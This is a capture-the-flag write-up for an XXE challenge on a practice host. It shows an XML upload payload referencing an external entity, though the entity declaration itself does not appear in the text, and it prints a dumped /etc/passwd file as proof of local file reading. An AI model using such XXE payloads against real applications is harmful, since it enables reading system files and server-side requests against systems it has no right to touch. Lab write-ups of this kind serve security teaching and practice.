Skip to content

XXE

Description

Write Up: Guillaume
Créateur: WOCSA
Difficulté: Inconnu

Enoncé

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Solution détaillée

Exploitation

Create a XML template and add it to http://wg2d3m2w.3xploit.me/my_tutorials/

You can write something like :

<tutorial>
    <title>&xxe;</title>
    <creation_date>2024-05-04</creation_date>
    <published>True</published>
    <author>User123</author>
    <text_contents>
        <text_content>
            <bodyline>This is the content of the tutorial.</bodyline>
            <creation_date>2024-05-04</creation_date>
        </text_content>
        <text_content>
            <bodyline>More content...</bodyline>
            <creation_date>2024-05-05</creation_date>
        </text_content>
    </text_contents>
    <picture_contents>
        <picture_content>
            <picture>example.jpg</picture>
            <creation_date>2024-05-04</creation_date>
        </picture_content>
        <picture_content>
            <picture>another_example.jpg</picture>
            <creation_date>2024-05-05</creation_date>
        </picture_content>
    </picture_contents>
</tutorial>

PoC

With this you can do many things like LFI, SSRF or even RCE in certains contexts :

/etc/passwd : 

root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin
Risk

Attacker with an XXE can read and request anythings on the server, recovering all the data that he want Remediation

Don't interpret specials functions in XML